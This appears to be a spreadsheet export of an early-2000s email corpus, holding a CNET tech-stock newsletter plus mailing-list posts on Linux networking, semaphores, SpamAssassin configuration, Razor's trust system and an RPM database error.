 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#cc0000&gt;-29.82%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=74-VAV8IZZSXVgiWi0RYG8Y0gSPZxnR" &gt;AMTCW&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;1.6&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#cc0000&gt;-28.89%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=89-h28bQ-J1j62PDOykUMBXB6W5WWcR" &gt;DSGIF&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;1.83&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#cc0000&gt;-25.00%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=9e-tWQoQtMQnKi_EvjHSCN0U7nQUDRR" &gt;HGPI&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;1.9&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#cc0000&gt;-24.00%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=b4-aJlbQ6Z1uGRVfxYqJzDxDXozLCdR" &gt;MTMS&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;3.1&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#cc0000&gt;-22.50%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /tech losers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href="http://clickthru.online.com/Click?q=c9-3OZLQpgkBBpm4f8jg0SxiPZvH6cR" &gt;Live tech help NOW!&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=de-7tpkQMWawxVrto_tTbDS-BJjhoRR" &gt;April's tech award&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=f3-LjwgQJOwQdqoMYgCs3CyJqsjeoFR" &gt;1 million open jobs&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=08-IFoQIRjFBPn5KLOg3F-erCpGY99R" &gt;News.com: Top CIOs&lt;/a&gt; &lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=1d-6KTjIGQFRzqfjDORl28NRQSnqQuR"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15,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href="http://clickthru.online.com/Click?q=32-Gx5IIrQ6QBLavRBDFWVhZSgRXBsR" &gt;DJIA&lt;/a&gt;&lt;br&gt;8639.19 &amp;nbsp;&lt;font color=#cc0000&gt;-45.34&lt;/font&gt;&lt;/td&gt;
 &lt;td width="25%"&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_up.gif" width="7" height="9" alt="" border="0" /&gt; &lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=47-ADmxIIZHloK133NOiJGu_NEsnEPR" &gt;NASDAQ&lt;/a&gt;&lt;br&gt;1382.54 &amp;nbsp;&lt;font color=#009933&gt;9.04&lt;/font&gt;&lt;/td&gt;
 &lt;td width="25%"&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt; &lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=5d-JN-bIK0sQsg1wM2obvZm5yGKIaeR" &gt;S&amp;P 500&lt;/a&gt;&lt;br&gt;917.92 &amp;nbsp;&lt;font color=#cc0000&gt;-3.47&lt;/font&gt;&lt;/td&gt;
 &lt;td width="25%"&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_up.gif" width="7" height="9" alt="" border="0" /&gt; &lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=72-R8PHIPUfKoFiqzhrqMtNXjoCKqyR" &gt;CNET&amp;nbsp;TECH&lt;/a&gt;&lt;br&gt;1,005.33 &amp;nbsp;&lt;font color="#cc0000"&gt;&lt;font color=#009933&gt;15.22&lt;/font&gt;&lt;/font&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=4&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;/td&gt;&lt;/tr&gt;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rise, but Dow falls on day of Bush speech&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 Technology shares climbed Monday as Pres. Bush gave a speech outlining a plan for long-term growth.
 &lt;p&gt;
 Tech investors also heard positive comments on Intel by C.S. First Boston, and snapped up shares in the chip, storage and computer server hardware sectors. CNET's Tech index rose 15.22 points, or 1.53 percent, to 1,005.33, and the tech-heavy Nasdaq composite index gained 9.04 points, or 0.65 percent, to 1,382.54.
 &lt;p&gt;
 Amid news of a weakening dollar and an unexpected rise in business inventories in May, broader markets sank. Recovering some from early-day losses, the Dow Jones industrials finished by giving up 45.4 points, or 0.52 percent, to 8,639.1, and the S&amp;P 500 slid 3.47 points, or 0.38 percent, to 917.92.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href="http://clickthru.online.com/Click?q=87-izDOQ8naL1SPch9eplrQ8kasp4ZR" &gt;Will IBM's new "Shark" sink or swim? &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 IBM announced a new top-end "Shark" storage system Monday that could boost the company's prospects against entrenched competitors in the depressed storage market.
 Three years ago, IBM introduced its first Enterprise Storage System product, code-named Shark, in an attempt to rebuild a market it had almost totally ceded to rivals EMC and Hitachi Data Systems.&lt;br&gt;&lt;B&gt;INTL BUSINESS MACHINES 71.00 2.59% &lt;/B&gt;
 &lt;p&gt;
 &lt;font size=3&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=9c-xt6pQanyyfls1o7lXdIl9Oi-UidR" &gt;New products help absorb AMD pain &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 Advanced Micro Devices turned out two new chips Monday, but its most anticipated release this week will be its second quarter results.
 As expected, AMD launched on Monday a new mobile Athlon XP 1800+ chip for notebooks. The company also announced Monday it has begun shipping MirrorBit, its newest flash memory product for storing data in cell phones and other devices.&lt;br&gt;&lt;B&gt;ADVANCED MICRO DEV 9.25 1.65% &lt;/B&gt;
 &lt;p&gt;
 &lt;font size=3&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=b1-YjxJQ-0ddpiqLYVr9i_f_B0NLncR" &gt;Microsoft tries to steal Macworld thunder &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 Microsoft on Monday launched the first of several pre-emptive strikes against Apple Computer's Macworld trade show by making announcements about new technologies far ahead of their delivery to market.
 The strategic attack comes as tensions mount between Apple and Microsoft. During Macworld five years ago, the two companies announced a five-year technology agreement, whereby Microsoft committed to continued development of Office and Internet Explorer for the Mac.&lt;br&gt;&lt;B&gt;MICROSOFT CORP 51.80 -0.12%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href="http://clickthru.online.com/Click?q=c6-URF9QMLKscR5xzxWdT_pfmeDx0RR"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href="http://clickthru.online.com/Click?q=dc-40zzQ0LrtqWv8TABz6gEwTinhldR" &gt;C.S. First Boston expects an upbeat outlook from Intel in tech notes 7/15/02 &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 Analyst Tim Mahon predicts the chip titan will report second-quarter results in-line with expectations, but offer better-than-expected guidance for the third quarter. Intel rival AMD's poor quarterly results stemmed more from company-specific issues than PC market troubles, Mahon says. And he points to other evidence of PC strength, such as Dell's positive comments about the current quarter. Mahon also expects Intel to speak confidently about its new 845G chipset, which he suggests could pressure the shares of graphics chip firms. Mahon reiterates a "buy" rating on Intel.&lt;br&gt;&lt;B&gt;INTEL CORP 19.12 6.28% &lt;/B&gt;&lt;br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=f1-MtTuQpsFWuDnoI0H3XX8owMnercR"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href="http://clickthru.online.com/Click?q=06-fP6uI482xKwv36Gmap_vCgSyiLRR" &gt;EMC appoints independent director to board &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 No. 1 data storage machine maker EMC Corp. on Monday said it named an outsider to its board of directors, bowing to pressure from shareholders who said the board had too many insiders.
 EMC said Gail Deegan, the former chief financial officer of Houghton Mifflin Co., will become the eighth member of its board, filling a seat left vacant since the fall. Deegan, 55, will also be a member of the audit committee.&lt;br&gt;&lt;B&gt;EMC CORP 9.10 6.43% &lt;/B&gt;&lt;br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=1b-wAnhI3N2M0pf5lHQ1U5MauO37xFR"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href="http://clickthru.online.com/Click?q=30-u8NEIRrWWwvZdzp8IeOdSKzjX19R" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/p/06060digidark.jpg" width="85" height="110" border="0" alt="" /&gt;&lt;/a&gt;&lt;/td&gt;
         &lt;td width="5"&gt;&lt;img src="http://home.cnet.com/b.gif" height=1 width=5&gt;&lt;/td&gt;
         &lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=45-fNkJIKB6r6jyU0g-EDvznhjonleR"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href="http://clickthru.online.com/Click?q=5a-ahD1IP0IIKnqKKh24YOLpk6Td6yR" &gt;Panasonic's littlest Lumix&lt;/a&gt;&lt;br /&gt;
         &amp;#149; &lt;a href="http://clickthru.online.com/Click?q=6f-3x79IOLA63gQWZU3RXvLF34ULXPR"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href="http://clickthru.online.com/Click?q=84-CCOyQ60Tk7pJAgWZsihsBSWgp7dR" &gt;Canon PowerShot G2&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
         2. &lt;a href="http://clickthru.online.com/Click?q=99-4mtyQAdTQq4CvHw2H3f2jvrqULcR" &gt;Canon PowerShot S30&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
         3. &lt;a href="http://clickthru.online.com/Click?q=af--dB8QLpqy-Rxum-ydDX7NdmUVSZR" &gt;Canon PowerShot S40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
         4. &lt;a href="http://clickthru.online.com/Click?q=c4-Iy9lQ0WwvJFU-jekHF6q-jPexAdR" &gt;Canon PowerShot A40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
         5. &lt;a href="http://clickthru.online.com/Click?q=d9-b7L_QpPwUJIIq0uie23s1N87hJcR" &gt;Sony Cyber Shot DSC-F707&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="6" alt="" border="0" /&gt;&lt;br /&gt;
         &lt;img src="http://a.r.tv.com/cnet.1d/i/fd/yl_arrow.gif" width="13" height="13" border="0" alt="" align="absmiddle" /&gt; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=ee-ZbmWQwDkhiWq8RD0QzbMuLbLadRR"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href="http://clickthru.online.com/Click?q=03-13t3I3rzdxDIoC4hKQcaLlAI6OFR"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href="http://clickthru.online.com/Click?q=18-WhdzI98qUhmksDkTiMEyR1N6759R" &gt;FREE for 30 days. Click
             here!&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;p&gt;&lt;a href="http://clickthru.online.com/Click?q=2d-OxQyIbKHcl3wuFmVdngyV7VDjSuR" &gt;&lt;img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is&amp;nbsp;qqqqqqqqqq-cnet-newsletters@spamassassin.taint.org&lt;/font&gt;&lt;/p&gt;
       &lt;p&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;
 &lt;A NOTRACK HREF='http://clickthru.online.com/Click?q=42-rFpczrKrJ-kfrHAZzBsRlnOKMehAodRR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-cnet-newsletters@spamassassin.taint.org&amp;brand=cnet'&gt;Manage My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=58-mr2xIdJHO_ru9COYjKHbtbXYzH4R" &gt;FAQ&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=6d-e8plIDEI0CYv1-O7Bc1bJBykEmeR"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href="http://clickthru.online.com/Click?q=82-P0EYQXK146nJLX96gJLkjCXMZHsR" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=97-dlfYQ1M1BiQRJ9a3V0z6qjySJGZR" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=ac-RbKtQ0UKe8nDUCsdWfGJ0kSyVjdR" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=c1-PIljQpWqZ4lFFhqwiOPYOLipujcR" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=d6-yw2KQMPdL6pkaBcnOIRzw0LGkkRR" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=eb-HlpoQkDFMhIOlecdo6MzbuNK5xFR"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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136487&amp;NL=e426&amp;ISSUE=2002-07-15" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 .&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=01-9oQDnEjoOqVS8eC3hPwESegnbdRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] Network problems
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi guys,
 	I'm looking for help on this one. I have a server with SME5.5 installed
 - used to be e-smith. It's based on RH7.1, has a 3c507 NIC, and is
 connected to a hub. Also connected to the hub are a laptop and
 workstation, both with RH7.3 . The server supplies DHCP amongst other
 things.
 	The problem is interruptions in the network. If I ping the laptop from
 the workstation, or the other way around, there are no problems, i.e.
 shows up as 0% loss. If however I ping the server from the laptop or
 workstation, it will do a few packets, anywhere from 3 to 20, and then
 stop responding, it will start again after a little while.
 	The server is definitely not overloaded, 128Mb, and seems to be
 configured correctly. In /etc/modules.conf,;
 options 3c507 irq=0x5 io=0x300
 alias eth0 3c507
 there is an option in there for something called hisax, but whatever
 that is, the machine doesn't have one.
 	doing route shows 192.168.0.0 as going through eth0 which is correct.
 	Any help on this appreciated.
 	Eamonn
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Recommended Viewing
</t>
  </si>
  <si>
    <t xml:space="preserve">who watched Lathe of Heaven?  (A&amp;E, 8 pm EDT)  who has seen the original?
 if it's airing now on the west coast, do catch it.
 gg
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAtalk] http://www.spamassassin.org
</t>
  </si>
  <si>
    <t xml:space="preserve">On Monday 22 July 2002 07:00 CET John Rudd wrote:
 &gt; On Sunday, July 21, 2002, at 08:30 , Bob Proulx wrote:
 &gt; &gt; &gt; http://www.spamassassin.org
 &gt; &gt; &gt; Is anyone besides me having problems getting to the site?
 Jepp. The same is true for Justin's private page jmason.org. traceroutes to 
 both these servers die at the same point:
 | mss@otherland:~&gt; /usr/sbin/traceroute spamassassin.org
 | traceroute to spamassassin.org (212.17.35.15), 30 hops max, 40 byte
 |  packets
 |  1  nebukadnezar.msquadrat.de (10.10.1.111)  9 ms  1 ms  1 ms
 |  2  212.185.255.161 (212.185.255.161)  54 ms  54 ms  55 ms
 |  3  212.185.255.162 (212.185.255.162)  55 ms  54 ms  55 ms
 |  4  F-gw13.F.NET.DTAG.DE (62.154.18.46)  63 ms  62 ms  62 ms
 |  5  rt007ffm.de.vianw.net (194.231.40.201)  63 ms  62 ms  61 ms
 |  6  r1ffm.vianw.net (213.2.254.45)  62 ms  63 ms  62 ms
 |  7  r2ffm.vianw.net (213.2.254.42)  63 ms  63 ms  63 ms
 |  8
 There're probably some problems with Justin's webserver; I'm shure he's 
 already looking into this as it affects his own website, too :o)
 &gt; &gt; What site is that one?  Isn't this site on sourceforge the official
 &gt; &gt; home page?
 &gt; &gt;
 &gt; &gt;   http://spamassassin.sourceforge.net/
 spamassassin.sf.net is the US mirror, also accessible through 
 us.spamassassin.org.
 &gt; They appear to be the same page, but until recently I could get to the
 &gt; www. spamassassin.org one, but it hasn't been responsive the last couple
 &gt; days.
 For me it worked until yesterday or the day before.
 &gt; But then, I also haven't been able to get anyone to answer my questions
 &gt; about user_prefs files (not the one from earlier today, but from a couple
 &gt; days ago).
 About this question: No, that's currently not possible. But I was thinking 
 about implementing a feature like this; it might be in the next release.
 Malte
 -- 
 -- Coding is art.
 -- 
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, 6 Sep 2002, Eugen Leitl wrote:
 &gt; On Thu, 5 Sep 2002 bitbitch@magnesium.net wrote:
 &gt; 
 &gt; &gt; If guys still have silly antequated ideas about 'women's role' then
 &gt; &gt; their opportunities for finding women _will_ be scarce.  
 &gt; 
 &gt; What is silly and antiquated depends a lot on which country you live in.
 It also depends on what the fad is or what is in style.  (:
 &gt; I don't have statistics on the love half life, but it seems long-term 
 &gt; relationships use something else for glue.
 &gt; 
 &gt; Clearly our non-silly non-antiquated ideas about relationships have
 &gt; resulted in mostly short-duration relationships and single-parented,
 &gt; dysfunctional kids (not enough of them too boot, so to keep our
 &gt; demographics from completely keeling over we're importing them from places
 &gt; with mostly silly and antiquated ideas).
 Actualy our silly antiquated ideas about relationships and love have 
 resulted in the bleedings of many upon many a page (and musical  instrumnet, 
 and canvas)  What's the problem if we dash a little Mrs. Dash on them?  (:  
 Or cayenne.  Or ginger. (mm ask me about ginger root play).  
 And let me tell you this: just because a child happens to be 
 single-parented (what a word), does not mean that child is dysfunctional 
 or lives in a dysfunctional home.  The govt/media/church has tried to make 
 it look like there is a disintegration, when in fact, there is a coming 
 together of other family members and friends to raise children.  It's not 
 decaying -- it's changing.  Nothing wrong with change.
 &gt; At least from the viewpoint of demographics sustainability and
 &gt; counterpressure to gerontocracy and resulting innovatiophobia we're doing
 &gt; something wrong.
 &gt; 
 &gt; Maybe we should really go dirty Tleilaxu all the way.
 &gt; 
 Maybe y'all should buy m-w some more bandwidth.
 C
 -- 
 "I don't take no stocks in mathematics, anyway" --Huckleberry Finn
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Rambus, Man
</t>
  </si>
  <si>
    <t xml:space="preserve">This message was sent to you from http://www.idg.net
 Geege would like you to read the story below:
 http://www.idg.net/gomail.cgi?id=940026
 Title:
 A first look at the 2.8-GHz Pentium 4
 Summary:
 Latest Rambus memory plus fast bus appear to give Intel's newest P4 the jolt it needs.
 Geege attached the following message:
 ------------------------------------------------------------
 ha ha ha harley.  rambus earns it.
 ------------------------------------------------------------
 Stay on top of the world of Information Technology with your own
 FREE subscription to our specialized newsletters. Subscribe now
 at http://www.idg.net/subscribe
 7132
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] semaphores on linux RH7.3
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi All,
 I have a question which is a bit tricky and was
 wondering of anyone has come across this problem
 before or could point me in the right direction.
 I am involved in porting a SCO unix application to
 Linux, and we have encountered a problem with the way
 semaphores  are being handled. The application uses
 mulitple processes to run application code with the
 main process known as the bsh which controls all i/o
 be it screen, or file i/o, syncronisation is handled
 via semaphores.
 In certain circumstances the main process and the
 application child process seem to lock up both waiting
 for the syncronisation semaphores to change state, I
 have attached ddd to the processes and it seems that
 the semaphore code is doing the correct things for
 syncronisation but the processes stay stuck in the
 semop() system call.
 I have also noticed that if I introduce a slight delay
 between changing semaphore states the problem goes
 away, but this causes our entire application to run
 really sloooww !! lol
 Is there anything weird or different with the standard
 implemenation of semaphores on modern linux that could
 cause a semop() to fail to pick up the change in state
 in a semaphore immediately?
 Setting sem_flg = IPC_NOWAIT and checking for errno ==
 EAGAIN and recalling semop() if the semop() call fails
 (-1) also fixes the problem but again system
 performance goes down the toilet.
 both the parent controlling process run as the same
 uid, and the parent creates the semaphores with
 permissions 0666.
 Any pointers would be appreciated!
 Rgds,
 Colin Nevin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</si>
  <si>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Subject: Re: [SAtalk] Blocking ?
</t>
  </si>
  <si>
    <t xml:space="preserve">This is possible, however using SA as a block criteria is not recommended. 
 SA does have a very realistic chance of mis-marking mail so using it as an 
 autodelete function is at best extraordinarily foolish.
 However, here's what the procmail rule will look like (dug up from an old 
 post to this list by Steve Thomas):
 --------------------------------------------------------------------
 in your .procmailrc file:
 :0
 * x-spam-status: yes
 /dev/null
 DO NOT DO THIS! You'll throw out a LOT of legitimate messages over time.
 Instead, do what the docs suggest and put them into a separate mail folder:
 :0:
 * x-spam-status: yes
 $MAILDIR/spam
 --------------------------------------------------------------------
 At 02:55 PM 11/25/2002 +0100, Erik Jakobsen wrote:
 &gt;Hi.
 &gt;
 &gt;How can I block e-mails comming to me by aid of SA ??.
 &gt;--
 &gt;Med venlig hilsen - Best regards.
 &gt;Erik Jakobsen - erik@urbakken.dk
 &gt;SuSE Linux 8.1
 &gt;
 &gt;
 &gt;-------------------------------------------------------
 &gt;This sf.net email is sponsored by:ThinkGeek
 &gt;Welcome to geek heaven.
 &gt;http://thinkgeek.com/sf
 &gt;_______________________________________________
 &gt;Spamassassin-talk mailing list
 &gt;Spamassassin-talk@lists.sourceforge.net
 &gt;https://lists.sourceforge.net/lists/listinfo/spamassassin-talk
 -------------------------------------------------------
 This SF.net email is sponsored by: Get the new Palm Tungsten T 
 handheld. Power &amp; Color in a compact size! 
 http://ads.sourceforge.net/cgi-bin/redirect.pl?palm0002en
 _______________________________________________
 Spamassassin-talk mailing list
 Spamassassin-talk@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/spamassassin-talk
</t>
  </si>
  <si>
    <t xml:space="preserve">Mark Derricutt wrote:
 &gt; Hiya, I just myself an rpm, and when I did -Uvh to upgrade the earlier 
 &gt; version I had installed (also from my rpm) I got:
 &gt; 
 &gt; [root@spawn i386]# rpm -Uvh mulberry-2.2-b1.i386.rpm
 &gt; Preparing...                ########################################### 
 &gt; [100%]
 &gt;   1:mulberry               ########################################### 
 &gt; [100%]
 &gt; error: db3 error(-30998) from db-&gt;close: DB_INCOMPLETE: Cache flush was 
 &gt; unable to complete
 It's not the rpm, it's the rpm-system with you. The cache seems to have 
 rottened. Try removing /var/lib/rpm/__db*
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">
 On Thursday, August 8, 2002, at 09:05  AM, Gregory Sloop wrote:
 &gt; I agree (I think)....
 &gt;
 &gt; But gaming the system, for any system, (spamassassin included) is extra
 &gt; work.
 Yes, it's definitely extra work.  The question is how much extra 
 work, both up front, and then on an ongoing basis.  I know 
 nothing about how the trust system is working (still waiting for 
 that long-promised server code to be published), but now that 
 it's been turned on, and the more info that's coming out about 
 it, the more concerned I'm becoming that it's extremely easy to 
 game; that the initial amount of work to set up a gaming agent 
 is low, and that once it's set up, it can be "fire and forget" 
 in terms of continuing to operate in a way that's not easy to 
 distinguish from real user behavior.
 &gt; Sure, you can find a way to work almost any system, but few 
 &gt; users (spammers)
 &gt; will actually take the time to game the system.
 Another concern I have with the way the system might be working 
 is that it might not actually require very many gamers at all to 
 utterly undermine the whole system.  There are a certain number 
 of possible universes where the trust system is very sensitive 
 to liars, or misclassifiers of "gray" mail, or both.  It's not 
 clear yet whether this universe is one of those or not.
 &gt; That means that we might have a system that is less than 100% 
 &gt; effective, but
 &gt; perfect accuracy and effectiveness comes at a prohibitive cost. 
 &gt; (Complex
 &gt; systems, time numbing hours of coding etc.)
 You do need a certain level of accuracy though, or the filter is 
 not economically worthwhile.  If you only filter 75% of spam, 
 you're wasting your time.  Some people receive on the order of a 
 10:1 ratio of spam:real mail -- 75% means the ratio adjusts to 
 5:2 which is still shitty.  95% makes it 1:2, which is better.  
 99% makes it 1:10 which is quite nice.  As the global ratio of 
 spam:mail rises, this problem gets somewhat more important.  
 With an order of magnitude worsening of the incoming spam:real 
 ratio, 100:1, 99% effective still works OK.  75% effective is 
 now really, really shitty.
 &gt; I can't vouch for Razor currently, as I'm not at all 
 &gt; knowledgeable. But I
 &gt; suspect the current route was picked because it was fairly simple to
 &gt; impliment, and it (at least some think) should work decently - if not
 &gt; completely without fault.
 Time will tell.  Time will also tell how good the system is at 
 adjusting over time to gaming strategies.
 &gt; I put up with some garbage results in SA, simply because it 
 &gt; blocks most of
 &gt; my spam, without too many false positives.
 SA definitely has a non-zero FP rate, and always will have.  I 
 would argue that any system will have a non-zero FP rate, 
 including the "no filter" filter -- humans make mistakes too 
 sometimes!  As spammer strategies evolve over time though, I'm 
 fairly sure that SA will be able to adjust and compensate.  If 
 spammers figure out how to easily pollute the SpamNet trust 
 system, I'm not sure how easy it'll be to replace the trust 
 system with something else.
 &gt; Perhaps Craig is just theorizing, but I just thought I'd offer my two
 &gt; ity-bits.
 Lots of theorizing, most of it based on little data.  The key 
 premises I'm worrying about though are:
 1. Trust system is easy to pollute
 2. Trust system is not personal, which makes the assumption that 
 all honest voters agree on what constitutes spam
 &gt; Somthing simple, and actually implimented, that works 
 &gt; reasonably well, is
 &gt; better than somthing that works perfectly, but will never be 
 &gt; implimented
 &gt; because of it's cost. (The rub is that everyone defines 
 &gt; "reasonably well" in
 &gt; dramatically different ways - *grin* as evidenced my the masses 
 &gt; that think
 &gt; Microsoft's stuff works "resaonably well" _bah_ - [but it does 
 &gt; keep me fully
 &gt; employed 'sigh']
 Razor2 seems to have been a long time in coming, apparently is 
 quite resource intensive (judging by Cloudmark's fundraising 
 efforts), and doesn't currently work.  It has great promise, and 
 I'm hoping that once the wrinkles are worked through, it'll add 
 another powerful tool in the war on spam -- I'm just concerned 
 that it's getting off on the wrong foot and might not be able to 
 recover.
 C
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">spamassassin-2.31-15.src.rpm is in RawHide. Take a look at how it's
 .spec file fixes the problem(s) you are encountering.
 On Wed, 2002-08-14 at 02:16, Victor wrote:
 &gt; Can someone tell me what I am doing wrong? it's like make doesn't take the
 &gt; PREFIX override... It's crazy. I don't get it...
 &gt; OS: TurboLinux6 rmp3.0.6 make 3.79.1
 &gt; 
 &gt; I just don't get this. It should work...
 &gt; 
 &gt; ---
 &gt; 
 &gt; %define real_name Mail-SpamAssassin
 &gt; %define real_version 2.31
 &gt; 
 &gt; ########################################################################
 &gt; # Package Information
 &gt; ########################################################################
 &gt; Name:         SpamAssassin
 &gt; Version:      2.31
 &gt; Summary:      SpamAssassin - A perl-based spam filter
 &gt; URL:          http://www.spamassassin.org
